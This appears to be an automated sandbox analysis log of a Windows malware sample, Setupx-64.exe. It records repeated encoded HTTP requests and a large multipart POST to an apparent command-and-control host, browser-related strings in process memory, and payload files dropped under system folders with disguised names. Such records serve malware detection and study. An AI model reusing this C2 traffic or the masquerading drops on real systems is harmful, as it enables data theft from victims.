Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSx0kaNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru

Source: global traffic	DNS traffic detected: DNS query: c.pki.goog
Source: global traffic	DNS traffic detected: DNS query: a1114171.xsph.ru

Source: unknown

HTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryhZ5M9Wqw26useWavUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: a1114171.xsph.ruContent-Length: 86516Expect: 100-continue

Source: upfc.exe, 00000014.00000002.2574244036.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a1114171.xsph.ru
Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a1114171.xsph.ru/
Source: upfc.exe, 00000014.00000002.2574244036.0000000005A62000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a1114171.xsph.ru/L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F
Source: Blockruntime.exe, 00000004.00000002.1374284879.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dCKtO8ZSpF.20.dr	String found in binary or memory: https://ac.ecosia.org?q=
Source: dCKtO8ZSpF.20.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: yRR0zph3RQ.20.dr, xg2xptyHVW.20.dr, 3pfssK3piJ.20.dr, ibYMlyqdlJ.20.dr, bBVOYBzZwx.20.dr, cIp7ttgDWm.20.dr, 4Gb7WAGepy.20.dr, k50cFDBVKc.20.dr, 84fCPrW8Zi.20.dr, 8Epf4Xhy5g.20.dr, wufzSvjpkT.20.dr, dXnToyQeNf.20.dr, fg0zDcELdn.20.dr, UG8bRYt4XQ.20.dr, FCzPTnNqz8.20.dr, I3unsbEAtx.20.dr, Kxhm06oS6b.20.dr, K4jRSxy7EF.20.dr, fXj3UIHIii.20.dr, jYIhdvOxwI.20.dr, dCKtO8ZSpF.20.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: yRR0zph3RQ.20.dr, xg2xptyHVW.20.dr, 3pfssK3piJ.20.dr, ibYMlyqdlJ.20.dr, bBVOYBzZwx.20.dr, cIp7ttgDWm.20.dr, 4Gb7WAGepy.20.dr, k50cFDBVKc.20.dr, 84fCPrW8Zi.20.dr, 8Epf4Xhy5g.20.dr, wufzSvjpkT.20.dr, dXnToyQeNf.20.dr, fg0zDcELdn.20.dr, UG8bRYt4XQ.20.dr, FCzPTnNqz8.20.dr, I3unsbEAtx.20.dr, Kxhm06oS6b.20.dr, K4jRSxy7EF.20.dr, fXj3UIHIii.20.dr, jYIhdvOxwI.20.dr, dCKtO8ZSpF.20.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: dCKtO8ZSpF.20.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: yRR0zph3RQ.20.dr, xg2xptyHVW.20.dr, 3pfssK3piJ.20.dr, ibYMlyqdlJ.20.dr, bBVOYBzZwx.20.dr, cIp7ttgDWm.20.dr, 4Gb7WAGepy.20.dr, k50cFDBVKc.20.dr, 84fCPrW8Zi.20.dr, 8Epf4Xhy5g.20.dr, wufzSvjpkT.20.dr, dXnToyQeNf.20.dr, fg0zDcELdn.20.dr, UG8bRYt4XQ.20.dr, FCzPTnNqz8.20.dr, I3unsbEAtx.20.dr, Kxhm06oS6b.20.dr, K4jRSxy7EF.20.dr, fXj3UIHIii.20.dr, jYIhdvOxwI.20.dr, dCKtO8ZSpF.20.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: dCKtO8ZSpF.20.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: dCKtO8ZSpF.20.dr	String found in binary or memory: https://gemini.google.com/app?q=
Source: OqnhWfJNrM.20.dr	String found in binary or memory: https://support.mozilla.org
Source: OqnhWfJNrM.20.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005A62000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D24000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: OqnhWfJNrM.20.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: yRR0zph3RQ.20.dr, xg2xptyHVW.20.dr, 3pfssK3piJ.20.dr, ibYMlyqdlJ.20.dr, bBVOYBzZwx.20.dr, cIp7ttgDWm.20.dr, 4Gb7WAGepy.20.dr, k50cFDBVKc.20.dr, 84fCPrW8Zi.20.dr, 8Epf4Xhy5g.20.dr, wufzSvjpkT.20.dr, dXnToyQeNf.20.dr, fg0zDcELdn.20.dr, UG8bRYt4XQ.20.dr, FCzPTnNqz8.20.dr, I3unsbEAtx.20.dr, Kxhm06oS6b.20.dr, K4jRSxy7EF.20.dr, fXj3UIHIii.20.dr, jYIhdvOxwI.20.dr, dCKtO8ZSpF.20.dr	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: yRR0zph3RQ.20.dr, xg2xptyHVW.20.dr, 3pfssK3piJ.20.dr, ibYMlyqdlJ.20.dr, bBVOYBzZwx.20.dr, cIp7ttgDWm.20.dr, 4Gb7WAGepy.20.dr, k50cFDBVKc.20.dr, 84fCPrW8Zi.20.dr, 8Epf4Xhy5g.20.dr, wufzSvjpkT.20.dr, dXnToyQeNf.20.dr, fg0zDcELdn.20.dr, UG8bRYt4XQ.20.dr, FCzPTnNqz8.20.dr, I3unsbEAtx.20.dr, Kxhm06oS6b.20.dr, K4jRSxy7EF.20.dr, fXj3UIHIii.20.dr, jYIhdvOxwI.20.dr, dCKtO8ZSpF.20.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: OqnhWfJNrM.20.dr	String found in binary or memory: https://www.mozilla.org
Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D24000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: OqnhWfJNrM.20.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D24000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: OqnhWfJNrM.20.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/f
Source: upfc.exe, 00000014.00000002.2574244036.0000000005D72000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D24000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: upfc.exe, 00000014.00000002.2663108746.0000000013CFC000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2663108746.00000000136A6000.00000004.00000800.00020000.00000000.sdmp, 6vZy6GuGmM.20.dr, OqnhWfJNrM.20.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/UC
Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/p
Source: OqnhWfJNrM.20.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2663108746.0000000013CFC000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2663108746.00000000136A6000.00000004.00000800.00020000.00000000.sdmp, 6vZy6GuGmM.20.dr, OqnhWfJNrM.20.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D24000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: upfc.exe, 00000014.00000002.2663108746.0000000013CFC000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2663108746.00000000136A6000.00000004.00000800.00020000.00000000.sdmp, 6vZy6GuGmM.20.dr, OqnhWfJNrM.20.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: C:\Program Files (x86)\Google\Update\upfc.exe

Window created: window name: CLIPBRDWNDCLASS

Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	File created: C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe	Jump to behavior
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	File created: C:\Windows\PolicyDefinitions\en-US\55b276f4edf653	Jump to behavior
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	File created: C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe	Jump to behavior
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	File created: C:\Windows\Speech\Engines\TTS\en-US\9e8d7a4ca61bd9	Jump to behavior

Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008B857B	0_2_008B857B
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008C70BF	0_2_008C70BF
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008DD00E	0_2_008DD00E
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008B407E	0_2_008B407E
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008E1194	0_2_008E1194
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008B3281	0_2_008B3281
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008BE2A0	0_2_008BE2A0
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008D02F6	0_2_008D02F6
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008C6646	0_2_008C6646
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008C37C1	0_2_008C37C1
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008B27E8	0_2_008B27E8
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008D070E	0_2_008D070E
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008D473A	0_2_008D473A
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008BE8A0	0_2_008BE8A0
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008BF968	0_2_008BF968
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008D4969	0_2_008D4969
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008C3A3C	0_2_008C3A3C
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008C6A7B	0_2_008C6A7B
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008D0B43	0_2_008D0B43
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008DCB60	0_2_008DCB60
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008C5C77	0_2_008C5C77
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008CFDFA	0_2_008CFDFA
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008BED14	0_2_008BED14
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008C3D6D	0_2_008C3D6D
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008BBE13	0_2_008BBE13
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008BDE6C	0_2_008BDE6C
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008B5F3C	0_2_008B5F3C
